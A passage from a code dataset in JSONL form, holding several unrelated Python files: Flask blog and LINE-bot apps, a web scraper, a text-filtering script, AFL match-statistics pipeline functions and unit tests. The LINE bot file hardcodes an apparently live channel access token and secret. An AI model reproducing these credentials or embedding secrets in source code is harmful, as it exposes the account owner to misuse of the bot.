Db()\n sql = \"\"\" select * from \"BlogYazisi\" where \"Id\" = %s \"\"\"\n data = database.read_data(sql, (id,))\n sql2 = \"\"\" select * from \"Yorum\" where \"BlogId\" = %s \"\"\"\n data2 = database.read_data(sql2,(id,))\n return render_template(\"anasayfa/indexDetay.html\", data=data, iki=data2)\n\n@anasayfa.route(\"/yorum/save\", methods=[\"POST\"])\ndef save():\n blogId = request.form.get(\"BlogId\")\n ekleyen = request.form.get(\"Ekleyen\")\n yorum = request.form.get(\"Yorum\")\n\n database = Db()\n\n sql = \"\"\" insert into \"Yorum\" (\"BlogId\",\"Yorum\",\"Ekleyen\") values (%s,%s,%s) \"\"\"\n database.execute(sql, (blogId, yorum, ekleyen))\n #return render_template(\"anasayfa/indexDetay.html\")\n return redirect(\"/anasayfa\")","sub_path":"gun7/blog/views/AnasayfaController.py","file_name":"AnasayfaController.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"466784848","text":"\n\"\"\"\n Correspondances between the names used by RTE for the columns\n and the user defined names.\n \n\"\"\"\n\nfrom ...... import global_var\n\n\ncolumns = {'Capacité de production Installée (MW)' : global_var.capacity_nominal_mw,\n 'Date de suppression' : global_var.capacity_end_date_local,\n 'Localisation' : global_var.geography_country,\n 'Type' : global_var.production_source,\n 'Date de création' : global_var.publication_creation_dt_local,\n 'Niveau de tension de connexion (KVT)' : global_var.unit_voltage_connection,\n 'Nom de la centrale de production' : global_var.unit_name,\n }","sub_path":"pub_data_visualization/production_capacity/unit/load/rte/transcode/columns.py","file_name":"columns.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"479836727","text":"from flask import Flask, request, abort,render_template\nimport os\nfrom flask.ext.sqlalchemy import SQLAlchemy\n\nfrom linebot import (\n LineBotApi, WebhookHandler\n)\nfrom linebot.exceptions import (\n InvalidSignatureError\n)\nfrom linebot.models import (\n MessageEvent, TextMessage, TextSendMessage,\n)\n\napp = Flask(__name__)\n\nline_bot_api = LineBotApi('tuyTz2UhcdDRg7Yr7Z5p7vxAa3htiT3FeuthTXfUNGtiKjqxit7mnynnVlOWt4Ee4DSsl02ZqhUDVi7IIWizH00gAMSq2XsF1WWe1KKroiz2OWPfa5qo41FwVCjN7gqykdLYSH9z9TTd6U0FOb8IjwdB04t89/1O/w1cDnyilFU=')\nhandler = WebhookHandler('1b304804643b6c2c9aed1fac17cdd4ab')\nDATABASE_URL = os.environ.get('DATABASE_URL', 'sqlite:////tmp/flask_app.db')\n\napp.config['SQLALCHEMY_DATABASE_URI'] = DATABASE_URL\ndb = SQLAlchemy(app)\n\n\nclass User(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(100))\n email = db.Column(db.String(100))\n\n def __init__(self, name, email):\n self.name = name\n self.email = email\n\n\n@app.route(\"/callback\", methods=['POST'])\ndef callback():\n # get X-Line-Signature header value\n signature = request.headers['X-Line-Signature']\n\n # get request body as text\n body = request.get_data(as_text=True)\n app.logger.info(\"Request body: \" + body)\n\n # handle webhook body\n try:\n handler.handle(body, signature)\n except InvalidSignatureError:\n abort(400)\n\n return 'OK'\n\n\n@handler.add(MessageEvent, message=TextMessage)\ndef handle_message(event):\n line_bot_api.reply_message(\n event.reply_token,\n TextSendMessage(text=event.message.text))\n\n@app.route('/', methods=['GET'])\ndef index():\n return render_template('index.html', users=User.query.all())\n\nif __name__ == \"__main__\":\n app.run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"544707462","text":"from candlestick.patterns.candlestick_finder import CandlestickFinder\n\n\nclass BullishEngulfing(CandlestickFinder):\n def __init__(self, target=None):\n super().__init__(self.get_class_name(), 2, target=target)\n\n def logic(self, idx):\n candle = self.data.iloc[idx]\n prev_candle = self.data.iloc[idx + 1 * self.multi_coeff]\n b_prev_candle = self.data.iloc[idx + 2 * self.multi_coeff]\n\n close = candle[self.close_column]\n open = candle[self.open_column]\n\n\n prev_close = prev_candle[self.close_column]\n prev_open = prev_candle[self.open_column]\n\n \n b_prev_close = b_prev_candle[self.close_column]\n\n retorno = (close >= prev_open > prev_close and\n close > open and\n prev_close >= open and\n close - open > prev_open - prev_close and \n prev_close < b_prev_close and \n b_prev_close < prev_open)\n\n return retorno\n","sub_path":"candlestick/patterns/bullish_engulfing.py","file_name":"bullish_engulfing.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"454191786","text":"import requests\nfrom bs4 import BeautifulSoup\n\nurl = \"http://www.itest.info/courses\"\n#获取被抓取页面的html代码,并用html.parser来实例化BeautifulSoup,属于固定套路\nsoup = BeautifulSoup(requests.get(url).text, 'html.parser')\nprint(soup)\n#遍历页面上所有的h4\nfor course in soup.find_all('h4'):\n print(course.text)","sub_path":"pachong/get_course.py","file_name":"get_course.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"363367898","text":"# 首先json转成 index\\tsentence的形式\n# 去重 句子层面的filter\n# 去垃圾信息(特定 一般) 单词短语层面的filter\n# 去无关文本\n# 再处理成dataloader的形式\n\nimport os\nimport json\nimport sys\nimport random\nfrom tkinter import *\nimport pandas as pd\nimport numpy as np\nimport pdb\nimport re\n\nimport os\nimport time\nimport argparse\n\n'''\ntopic_name = \"鹿依\"\ndata_dir = os.path.join(\"./data\",topic_name)\nresult_dir = os.path.join(\"./result\",topic_name)\nnew_data_dir = os.path.join(\"./new_data\",topic_name)\n'''\n\ndef create_new(data_dir,result_dir,new_data_dir,check_data_dir):\n #valid_data = []\n #check_data = []\n text_data_list = []\n text_data_dict = {}\n result_data_list = []\n result_data_dict = {}\n for file_name in os.listdir(data_dir):\n if '.txt' not in file_name:\n continue\n file = os.path.join(data_dir,file_name)\n with open(file,'r') as f:\n text_data = f.readlines()\n text_data_list.append(file_name[:-4])\n text_data_dict[file_name[:-4]] = text_data\n f.close()\n\n\n for file_name in os.listdir(result_dir):\n if '.txt' not in file_name:\n continue\n file = os.path.join(result_dir,file_name)\n with open(file,'r') as f:\n result_data = f.readlines()\n result_data_dict[file_name[:-4]] = result_data\n f.close()\n\n assert(len(text_data_dict)==len(result_data_dict))\n\n for file in text_data_list:\n print(file)\n assert(len(text_data_dict[file])==len(result_data_dict[file]))\n valid_data = []\n check_data = []\n for i in range(len(result_data_dict[file])):\n check_line = {}\n result_line = result_data_dict[file][i]\n label = result_line.strip('\\n').split('\\t')[1]\n sentence_line = text_data_dict[file][i]\n sentence = sentence_line.strip('\\n')\n check_line = {'label':label,'sentence':sentence}\n if label == '1':\n valid_data.append(sentence)\n check_data.append(check_line)\n\n with open(os.path.join(new_data_dir,file+'.txt'),'w') as f:\n for data in valid_data:\n f.write(data+'\\n')\n f.close()\n\n with open(os.path.join(check_data_dir,file+'.txt'),'w') as f:\n for data in check_data:\n f.write('{}\\t{}\\n'.format(data['label'],data['sentence']))\n f.close()\n\n \n\ndef main():\n create_new(data_dir,result_dir,new_data_dir,check_data_dir)\n \n\nif __name__ == \"__main__\":\n main()","sub_path":"preprocess/neu_weibo/preprocess_test/compose_new.py","file_name":"compose_new.py","file_ext":"py","file_size_in_byte":2580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"107745153","text":"\"\"\"Pipeline nodes for transforming match data.\"\"\"\n\nfrom typing import List, Tuple\nfrom functools import partial, reduce, update_wrapper\nimport math\nimport re\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn.preprocessing import LabelEncoder\nfrom mypy_extensions import TypedDict\n\nfrom augury.settings import (\n FOOTYWIRE_VENUE_TRANSLATIONS,\n CITIES,\n VENUE_CITIES,\n TEAM_CITIES,\n INDEX_COLS,\n)\nfrom ..nodes.base import (\n _parse_dates,\n _translate_team_column,\n _validate_required_columns,\n _filter_out_dodgy_data,\n _convert_id_to_string,\n _validate_unique_team_index_columns,\n _validate_canoncial_team_names,\n)\n\n\nEloDictionary = TypedDict(\n \"EloDictionary\",\n {\n \"home_away_elo_ratings\": List[Tuple[float, float]],\n \"current_team_elo_ratings\": np.ndarray,\n \"year\": int,\n },\n)\n\n\nMATCH_COL_TRANSLATIONS = {\n \"home_points\": \"home_score\",\n \"away_points\": \"away_score\",\n \"margin\": \"home_margin\",\n \"season\": \"year\",\n \"game\": \"match_id\",\n \"home_goals\": \"home_team_goals\",\n \"away_goals\": \"away_team_goals\",\n \"home_behinds\": \"home_team_behinds\",\n \"away_behinds\": \"away_team_behinds\",\n}\n\nSHARED_MATCH_FIXTURE_COLS = [\n \"date\",\n \"venue\",\n \"year\",\n \"round_number\",\n \"home_team\",\n \"away_team\",\n]\n\nMATCH_INDEX_COLS = [\"year\", \"round_number\"]\n\nOPPO_REGEX = re.compile(\"^oppo_\")\n\n# Constants for Elo calculations\nBASE_RATING = 1000\nK = 35.6\nX = 0.49\nM = 130\nHOME_GROUND_ADVANTAGE = 9\nS = 250\nSEASON_CARRYOVER = 0.575\n\nEARTH_RADIUS = 6371\nTEAM_LEVEL = 0\nYEAR_LEVEL = 1\nWIN_POINTS = 4\n\n\n# AFLTables has some incorrect home/away team designations for finals 2019\ndef _correct_home_away_teams(match_data: pd.DataFrame) -> pd.DataFrame:\n round_24_2019 = (match_data[\"year\"] == 2019) & (match_data[\"round_number\"] == 24)\n incorrect_24_home_team = (match_data[\"home_team\"] == \"Collingwood\") | (\n match_data[\"home_team\"] == \"Richmond\"\n )\n\n round_25_2019 = (match_data[\"year\"] == 2019) & (match_data[\"round_number\"] == 25)\n incorrect_25_home_team = match_data[\"home_team\"] == \"GWS\"\n\n round_26_2019 = (match_data[\"year\"] == 2019) & (match_data[\"round_number\"] == 26)\n incorrect_26_home_team = match_data[\"home_team\"] == \"GWS\"\n\n reversed_home_away_teams = (\n (round_24_2019 & incorrect_24_home_team)\n | (round_25_2019 & incorrect_25_home_team)\n | (round_26_2019 & incorrect_26_home_team)\n )\n\n correct_match_data = match_data.loc[~reversed_home_away_teams, :]\n incorrect_match_data = match_data.loc[reversed_home_away_teams, :]\n\n renamed_match_data = incorrect_match_data.rename(\n columns=lambda col_name: (\n col_name.replace(\"home_\", \"away_\")\n if \"home_\" in col_name\n else col_name.replace(\"away_\", \"home_\")\n )\n )\n\n return correct_match_data.append(renamed_match_data, sort=False)\n\n\ndef clean_match_data(match_data: pd.DataFrame) -> pd.DataFrame:\n \"\"\"Clean, translate, and drop data in preparation for ML-specific transformations.\n\n Params\n ------\n match_data (pandas.DataFrame): Raw match data\n\n Returns\n -------\n Cleanish pandas.DataFrame\n \"\"\"\n if any(match_data):\n clean_data = (\n match_data.rename(columns=MATCH_COL_TRANSLATIONS)\n .astype({\"year\": int, \"round_number\": int})\n .pipe(\n _filter_out_dodgy_data(\n subset=[\"year\", \"round_number\", \"home_team\", \"away_team\"]\n )\n )\n .assign(\n match_id=_convert_id_to_string(\"match_id\"),\n home_team=_translate_team_column(\"home_team\"),\n away_team=_translate_team_column(\"away_team\"),\n date=_parse_dates,\n )\n .drop(\"round\", axis=1)\n .sort_values(\"date\")\n .pipe(_correct_home_away_teams)\n )\n\n _validate_unique_team_index_columns(clean_data)\n _validate_canoncial_team_names(clean_data)\n\n return clean_data\n\n return pd.DataFrame()\n\n\ndef _map_footywire_venues(venue: str) -> str:\n return (\n FOOTYWIRE_VENUE_TRANSLATIONS[venue]\n if venue in FOOTYWIRE_VENUE_TRANSLATIONS\n else venue\n )\n\n\ndef _map_round_type(year: int, round_number: int) -> str:\n TWENTY_ELEVEN_AND_LATER_FINALS = year > 2011 and round_number > 23\n TWENTY_TEN_FINALS = year == 2010 and round_number > 24\n TWO_THOUSAND_NINE_AND_EARLIER_FINALS = (\n year > 1994 and year < 2010 and round_number > 22\n )\n\n if year <= 1994:\n raise ValueError(\n f\"Tried to get fixtures for {year}, but fixture data is meant for \"\n \"upcoming matches, not historical match data. Try getting fixture data \"\n \"from 1995 or later, or fetch match results data for older matches.\"\n )\n\n if (\n TWENTY_ELEVEN_AND_LATER_FINALS\n or TWENTY_TEN_FINALS\n or TWO_THOUSAND_NINE_AND_EARLIER_FINALS\n ):\n return \"Finals\"\n\n return \"Regular\"\n\n\ndef _round_type_column(data_frame: pd.DataFrame) -> pd.DataFrame:\n years = data_frame[\"year\"].drop_duplicates()\n\n assert len(years) == 1, (\n \"Fixture data should only include matches from the next round, but \"\n f\"fixture data for seasons {list(years.values)} were given. \"\n f\"The offending series is:\\n{data_frame['year']}\"\n )\n\n return data_frame[\"round_number\"].map(\n update_wrapper(partial(_map_round_type, years.iloc[0]), _map_round_type)\n )\n\n\ndef _match_id_column(data_frame: pd.DataFrame) -> pd.Series:\n # AFL Tables match IDs start at 1 and go up, so using 0 & negative numbers\n # for fixture matches will guarantee uniqueness if it ever becomes an issue\n return pd.Series(range(0, -len(data_frame), -1)).astype(str)\n\n\ndef clean_fixture_data(fixture_data: pd.DataFrame) -> pd.DataFrame:\n \"\"\"Clean, translate, and drop data in preparation for ML-specific transformations.\n\n Params\n ------\n fixture_data (pandas.DataFrame): Raw fixture data\n\n Returns\n -------\n Cleanish pandas.DataFrame\n \"\"\"\n if not fixture_data.size:\n return pd.DataFrame()\n\n fixture_data_frame = (\n fixture_data.rename(columns={\"round\": \"round_number\", \"season\": \"year\"})\n .loc[:, SHARED_MATCH_FIXTURE_COLS]\n .dropna(subset=[\"home_team\", \"away_team\"])\n .assign(\n venue=lambda df: df[\"venue\"].map(_map_footywire_venues),\n round_type=_round_type_column,\n home_team=_translate_team_column(\"home_team\"),\n away_team=_translate_team_column(\"away_team\"),\n date=_parse_dates,\n match_id=_match_id_column,\n )\n .fillna(0)\n )\n\n _validate_unique_team_index_columns(fixture_data_frame)\n _validate_canoncial_team_names(fixture_data_frame)\n\n return fixture_data_frame\n\n\ndef clean_match_results_data(data_frame: pd.DataFrame):\n \"\"\"\n Clean and translate match results data to match other other data sets.\n\n Params\n ------\n data_frame: Match results data to be cleaned.\n\n Response\n --------\n Cleanish match results data.\n \"\"\"\n results_data_frame = (\n data_frame.rename(\n columns={\n \"hteam\": \"home_team\",\n \"ateam\": \"away_team\",\n \"hscore\": \"home_score\",\n \"ascore\": \"away_score\",\n \"round\": \"round_number\",\n }\n )\n .dropna(subset=[\"home_team\", \"away_team\"])\n .assign(\n date=_parse_dates,\n home_team=_translate_team_column(\"home_team\"),\n away_team=_translate_team_column(\"away_team\"),\n )\n .loc[\n :,\n [\n \"date\",\n \"home_team\",\n \"home_score\",\n \"away_team\",\n \"away_score\",\n \"round_number\",\n \"year\",\n ],\n ]\n )\n\n _validate_unique_team_index_columns(results_data_frame)\n _validate_canoncial_team_names(results_data_frame)\n\n return results_data_frame\n\n\n# Basing Elo calculations on:\n# http://www.matterofstats.com/mafl-stats-journal/2013/10/13/building-your-own-team-rating-system.html\ndef _elo_formula(\n prev_elo_rating: float, prev_oppo_elo_rating: float, margin: int, at_home: bool\n) -> float:\n home_ground_advantage = (\n HOME_GROUND_ADVANTAGE if at_home else HOME_GROUND_ADVANTAGE * -1\n )\n expected_outcome = 1 / (\n 1 + 10 ** ((prev_oppo_elo_rating - prev_elo_rating - home_ground_advantage) / S)\n )\n actual_outcome = X + 0.5 - X ** (1 + (margin / M))\n\n return prev_elo_rating + (K * (actual_outcome - expected_outcome))\n\n\n# Assumes df sorted by year & round_number with ascending=True in order to calculate\n# correct Elo ratings\ndef _calculate_match_elo_rating(\n elo_ratings: EloDictionary,\n # match_row = [year, home_team, away_team, home_margin]\n match_row: np.ndarray,\n) -> EloDictionary:\n match_year = match_row[0]\n\n # It's typical for Elo models to do a small adjustment toward the baseline between\n # seasons\n if match_year != elo_ratings[\"year\"]:\n prematch_team_elo_ratings = (\n elo_ratings[\"current_team_elo_ratings\"] * SEASON_CARRYOVER\n ) + BASE_RATING * (1 - SEASON_CARRYOVER)\n else:\n prematch_team_elo_ratings = elo_ratings[\"current_team_elo_ratings\"].copy()\n\n home_team = int(match_row[1])\n away_team = int(match_row[2])\n home_margin = match_row[3]\n\n prematch_home_elo_rating = prematch_team_elo_ratings[home_team]\n prematch_away_elo_rating = prematch_team_elo_ratings[away_team]\n\n home_elo_rating = _elo_formula(\n prematch_home_elo_rating, prematch_away_elo_rating, home_margin, True\n )\n away_elo_rating = _elo_formula(\n prematch_away_elo_rating, prematch_home_elo_rating, home_margin * -1, False\n )\n\n postmatch_team_elo_ratings = prematch_team_elo_ratings.copy()\n postmatch_team_elo_ratings[home_team] = home_elo_rating\n postmatch_team_elo_ratings[away_team] = away_elo_rating\n\n return {\n \"home_away_elo_ratings\": elo_ratings[\"home_away_elo_ratings\"]\n + [(prematch_home_elo_rating, prematch_away_elo_rating)],\n \"current_team_elo_ratings\": postmatch_team_elo_ratings,\n \"year\": match_year,\n }\n\n\ndef add_elo_rating(data_frame_arg: pd.DataFrame) -> pd.DataFrame:\n \"\"\"Append a column for teams' prematch Elo ratings.\"\"\"\n ELO_INDEX_COLS = {\"home_team\", \"year\", \"round_number\"}\n REQUIRED_COLS = ELO_INDEX_COLS | {\"home_score\", \"away_score\", \"away_team\", \"date\"}\n\n _validate_required_columns(REQUIRED_COLS, data_frame_arg.columns)\n\n data_frame = (\n data_frame_arg.set_index(list(ELO_INDEX_COLS), drop=False).rename_axis(\n [None] * len(ELO_INDEX_COLS)\n )\n if ELO_INDEX_COLS != {*data_frame_arg.index.names}\n else data_frame_arg.copy()\n )\n\n if not data_frame.index.is_monotonic:\n data_frame.sort_index(inplace=True)\n\n le = LabelEncoder()\n le.fit(data_frame[\"home_team\"])\n time_sorted_data_frame = data_frame.sort_values(\"date\")\n\n elo_matrix = (\n time_sorted_data_frame.assign(\n home_team=lambda df: le.transform(df[\"home_team\"]),\n away_team=lambda df: le.transform(df[\"away_team\"]),\n )\n .eval(\"home_margin = home_score - away_score\")\n .loc[:, [\"year\", \"home_team\", \"away_team\", \"home_margin\"]]\n ).values\n current_team_elo_ratings = np.full(len(set(data_frame[\"home_team\"])), BASE_RATING)\n starting_elo_dictionary: EloDictionary = {\n \"home_away_elo_ratings\": [],\n \"current_team_elo_ratings\": current_team_elo_ratings,\n \"year\": 0,\n }\n\n elo_columns = reduce(\n _calculate_match_elo_rating, elo_matrix, starting_elo_dictionary\n )[\"home_away_elo_ratings\"]\n\n elo_data_frame = pd.DataFrame(\n elo_columns,\n columns=[\"home_elo_rating\", \"away_elo_rating\"],\n index=time_sorted_data_frame.index,\n ).sort_index()\n\n return pd.concat([data_frame, elo_data_frame], axis=1)\n\n\ndef add_out_of_state(data_frame: pd.DataFrame) -> pd.DataFrame:\n \"\"\"Append a column for whether a team is playing out of their home state.\"\"\"\n REQUIRED_COLS = {\"venue\", \"team\"}\n _validate_required_columns(REQUIRED_COLS, data_frame.columns)\n\n venue_state = data_frame[\"venue\"].map(lambda x: CITIES[VENUE_CITIES[x]][\"state\"])\n team_state = data_frame[\"team\"].map(lambda x: CITIES[TEAM_CITIES[x]][\"state\"])\n\n return data_frame.assign(out_of_state=(team_state != venue_state).astype(int))\n\n\n# Got the formula from https://www.movable-type.co.uk/scripts/latlong.html\ndef _haversine_formula(\n lat_long1: Tuple[float, float], lat_long2: Tuple[float, float]\n) -> float:\n \"\"\"Calculate distance between two pairs of latitudes & longitudes.\"\"\"\n lat1, long1 = lat_long1\n lat2, long2 = lat_long2\n # Latitude & longitude are in degrees, so have to convert to radians for\n # trigonometric functions\n phi1 = math.radians(lat1)\n phi2 = math.radians(lat2)\n delta_phi = phi2 - phi1\n delta_lambda = math.radians(long2 - long1)\n a = math.sin(delta_phi / 2) ** 2 + (\n math.cos(phi1) * math.cos(phi2) * math.sin(delta_lambda / 2) ** 2\n )\n c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))\n\n return EARTH_RADIUS * c\n\n\ndef add_travel_distance(data_frame: pd.DataFrame) -> pd.DataFrame:\n \"\"\"Append column for distances between teams' home cities and match venue cities.\"\"\"\n required_cols = {\"venue\", \"team\"}\n _validate_required_columns(required_cols, data_frame.columns)\n\n venue_lat_long = data_frame[\"venue\"].map(\n lambda x: (CITIES[VENUE_CITIES[x]][\"lat\"], CITIES[VENUE_CITIES[x]][\"long\"])\n )\n team_lat_long = data_frame[\"team\"].map(\n lambda x: (CITIES[TEAM_CITIES[x]][\"lat\"], CITIES[TEAM_CITIES[x]][\"long\"])\n )\n\n return data_frame.assign(\n travel_distance=[\n _haversine_formula(*lats_longs)\n for lats_longs in zip(venue_lat_long, team_lat_long)\n ]\n )\n\n\ndef add_result(data_frame: pd.DataFrame) -> pd.DataFrame:\n \"\"\"Append a column for teamsa match results (win, draw, loss) as float.\"\"\"\n REQUIRED_COLS = {\"score\", \"oppo_score\"}\n _validate_required_columns(REQUIRED_COLS, data_frame.columns)\n\n wins = (data_frame[\"score\"] > data_frame[\"oppo_score\"]).astype(int)\n draws = (data_frame[\"score\"] == data_frame[\"oppo_score\"]).astype(int) * 0.5\n\n return data_frame.assign(result=wins + draws)\n\n\ndef add_margin(data_frame: pd.DataFrame) -> pd.DataFrame:\n \"\"\"Append a column for teams' points margins from matches.\"\"\"\n REQUIRED_COLS = {\"score\", \"oppo_score\"}\n _validate_required_columns(REQUIRED_COLS, data_frame.columns)\n\n return data_frame.assign(margin=data_frame[\"score\"] - data_frame[\"oppo_score\"])\n\n\ndef _shift_features(columns: List[str], shift: bool, data_frame: pd.DataFrame):\n if shift:\n columns_to_shift = columns\n else:\n columns_to_shift = [col for col in data_frame.columns if col not in columns]\n\n _validate_required_columns(columns_to_shift, data_frame.columns)\n\n shifted_col_names = {col: f\"prev_match_{col}\" for col in columns_to_shift}\n\n # Group by team (not team & year) to get final score from previous season for round 1.\n # This reduces number of rows that need to be dropped and prevents gaps\n # for cumulative features\n shifted_features = (\n data_frame.groupby(\"team\")[columns_to_shift]\n .shift()\n .fillna(0)\n .rename(columns=shifted_col_names)\n )\n\n return pd.concat([data_frame, shifted_features], axis=1)\n\n\ndef add_shifted_team_features(\n shift_columns: List[str] = [], keep_columns: List[str] = []\n):\n \"\"\"Group features by team and shift by one to get previous match stats.\n\n Use shift_columns to indicate which features to shift or keep_columns for features\n to leave unshifted, but not both.\n \"\"\"\n if any(shift_columns) and any(keep_columns):\n raise ValueError(\n \"To avoid conflicts, you can't include both match_cols \"\n \"and oppo_feature_cols. Choose the shorter list to determine which \"\n \"columns to skip and which to turn into opposition features.\"\n )\n\n shift = any(shift_columns)\n columns = shift_columns if shift else keep_columns\n\n return update_wrapper(partial(_shift_features, columns, shift), _shift_features)\n\n\ndef add_cum_win_points(data_frame: pd.DataFrame) -> pd.DataFrame:\n \"\"\"Append a column for teams' cumulative win points per season.\"\"\"\n REQUIRED_COLS = {\"prev_match_result\"}\n _validate_required_columns(REQUIRED_COLS, data_frame.columns)\n\n cum_win_points_col = (\n (data_frame[\"prev_match_result\"] * WIN_POINTS)\n .groupby(level=[TEAM_LEVEL, YEAR_LEVEL])\n .cumsum()\n )\n\n return data_frame.assign(cum_win_points=cum_win_points_col)\n\n\ndef add_win_streak(data_frame: pd.DataFrame) -> pd.DataFrame:\n \"\"\"Append a column for teams' running win/loss streaks.\n\n Streaks calculated through the end of the current match. Positive result\n (win or draw) adds 1 (or 0.5); negative result subtracts 1. Changes in direction\n (i.e. broken streak) result in starting over at 1 or -1.\n \"\"\"\n REQUIRED_COLS = {\"prev_match_result\"}\n _validate_required_columns(REQUIRED_COLS, data_frame.columns)\n\n win_groups = data_frame[\"prev_match_result\"].groupby(\n level=TEAM_LEVEL, group_keys=False\n )\n streak_groups = []\n\n for team_group_key, team_group in win_groups:\n streaks: List = []\n\n for idx, result in enumerate(team_group):\n # 1 represents win, 0.5 represents draw\n if result > 0:\n if idx == 0 or streaks[idx - 1] <= 0:\n streaks.append(result)\n else:\n streaks.append(streaks[idx - 1] + result)\n # 0 represents loss\n elif result == 0:\n if idx == 0 or streaks[idx - 1] >= 0:\n streaks.append(-1)\n else:\n streaks.append(streaks[idx - 1] - 1)\n elif result < 0:\n raise ValueError(\n f\"No results should be negative, but {result} \"\n f\"is at index {idx} of group {team_group_key}\"\n )\n else:\n # For a team's first match in the data set or any rogue NaNs, we add 0\n streaks.append(0)\n\n streak_groups.extend(streaks)\n\n return data_frame.assign(\n win_streak=pd.Series(streak_groups, index=data_frame.index)\n )\n\n\ndef add_cum_percent(data_frame: pd.DataFrame) -> pd.DataFrame:\n \"\"\"Append a column for teams' cumulative percentages.\n\n This is an official stat used as a tie-breaker for AFL ladder positions\n and is calculated as cumulative score / cumulative opponents' score.\n \"\"\"\n REQUIRED_COLS = {\"prev_match_score\", \"prev_match_oppo_score\"}\n _validate_required_columns(REQUIRED_COLS, data_frame.columns)\n\n cum_score = (\n data_frame[\"prev_match_score\"].groupby(level=[TEAM_LEVEL, YEAR_LEVEL]).cumsum()\n )\n cum_oppo_score = (\n data_frame[\"prev_match_oppo_score\"]\n .groupby(level=[TEAM_LEVEL, YEAR_LEVEL])\n .cumsum()\n )\n\n return data_frame.assign(cum_percent=cum_score / cum_oppo_score)\n\n\ndef add_ladder_position(data_frame: pd.DataFrame) -> pd.DataFrame:\n \"\"\"Append a column for teams' current ladder position.\"\"\"\n REQUIRED_COLS = INDEX_COLS + [\"cum_win_points\", \"cum_percent\"]\n _validate_required_columns(REQUIRED_COLS, data_frame.columns)\n\n # Pivot to get round-by-round match points and cumulative percent\n ladder_pivot_table = data_frame[\n INDEX_COLS + [\"cum_win_points\", \"cum_percent\"]\n ].pivot_table(\n index=[\"year\", \"round_number\"],\n values=[\"cum_win_points\", \"cum_percent\"],\n columns=\"team\",\n aggfunc={\"cum_win_points\": np.sum, \"cum_percent\": np.mean},\n )\n\n # To get round-by-round ladder ranks, we sort each round by win points & percent,\n # then save index numbers\n ladder_index = []\n ladder_values = []\n\n for year_round_idx, round_row in ladder_pivot_table.iterrows():\n sorted_row = round_row.unstack(level=TEAM_LEVEL).sort_values(\n [\"cum_win_points\", \"cum_percent\"], ascending=False\n )\n\n for ladder_idx, team_name in enumerate(sorted_row.index.to_numpy()):\n ladder_index.append(tuple([team_name, *year_round_idx]))\n ladder_values.append(ladder_idx + 1)\n\n ladder_multi_index = pd.MultiIndex.from_tuples(\n ladder_index, names=tuple(INDEX_COLS)\n )\n ladder_position_col = pd.Series(\n ladder_values, index=ladder_multi_index, name=\"ladder_position\"\n )\n\n return data_frame.assign(ladder_position=ladder_position_col)\n\n\ndef add_elo_pred_win(data_frame: pd.DataFrame) -> pd.DataFrame:\n \"\"\"Append a column for whether teams are predicted to win per their elo ratings.\"\"\"\n REQUIRED_COLS = {\"elo_rating\", \"oppo_elo_rating\"}\n _validate_required_columns(REQUIRED_COLS, data_frame.columns)\n\n is_favoured = (data_frame[\"elo_rating\"] > data_frame[\"oppo_elo_rating\"]).astype(int)\n are_even = (data_frame[\"elo_rating\"] == data_frame[\"oppo_elo_rating\"]).astype(int)\n\n # Give half point for predicted draws\n predicted_results = is_favoured + (are_even * 0.5)\n\n return data_frame.assign(elo_pred_win=predicted_results)\n\n\ndef _replace_col_names(at_home: bool):\n team_label = \"home\" if at_home else \"away\"\n oppo_label = \"away\" if at_home else \"home\"\n\n return (\n lambda col: col.replace(\"oppo_\", f\"{oppo_label}_\", 1)\n if re.match(OPPO_REGEX, col)\n else f\"{team_label}_{col}\"\n )\n\n\ndef _match_data_frame(\n data_frame: pd.DataFrame, match_cols: List[str] = [], at_home: bool = True\n) -> pd.DataFrame:\n home_index = \"team\" if at_home else \"oppo_team\"\n away_index = \"oppo_team\" if at_home else \"team\"\n # We drop oppo stats cols, because we end up with both teams' stats per match\n # when we join home and away teams. We keep 'oppo_team' and add the renamed column\n # to the index for convenience\n oppo_stats_cols = [\n col\n for col in data_frame.columns\n if re.match(OPPO_REGEX, col) and col != \"oppo_team\"\n ]\n\n return (\n data_frame.query(f\"at_home == {int(at_home)}\")\n # We index match rows by home_team, year, round_number\n .rename(columns={home_index: \"home_team\", away_index: \"away_team\"})\n .drop([\"at_home\"] + oppo_stats_cols, axis=1)\n # We add all match cols to the index, because they don't affect the upcoming\n # concat, and it's easier than creating a third data frame for match cols\n .set_index([\"home_team\", \"away_team\"] + MATCH_INDEX_COLS + match_cols)\n .rename(columns=_replace_col_names(at_home))\n .sort_index()\n )\n","sub_path":"src/augury/pipelines/match/nodes.py","file_name":"nodes.py","file_ext":"py","file_size_in_byte":22876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"173431240","text":"import sys\nsys.path.append(\"..\") # Adds the module to path\n\nimport unittest\n\nimport deeptrack.features as features\n\nimport numpy as np\nfrom deeptrack.image import Image\n\n\n\nclass TestFeatures(unittest.TestCase):\n\n def test_Feature_1(self):\n class FeatureConcreteClass(features.Feature):\n __distributed__ = False\n def get(self, *args, **kwargs):\n image = np.ones((2, 3))\n return image \n feature = FeatureConcreteClass()\n feature.update()\n output_image = feature.resolve()\n self.assertIsInstance(output_image, Image)\n self.assertEqual(output_image.size, 6)\n \n \n def test_Feature_2(self):\n class FeatureAddValue(features.Feature):\n def get(self, image, value_to_add=0, **kwargs):\n image = image + value_to_add\n return image\n feature = FeatureAddValue(value_to_add=1)\n feature.update()\n input_image = np.zeros((1, 1))\n output_image = feature.resolve(input_image)\n self.assertEqual(output_image, 1)\n self.assertListEqual(output_image.get_property(\"value_to_add\", get_one=False), [1])\n output_image = feature.resolve(output_image)\n 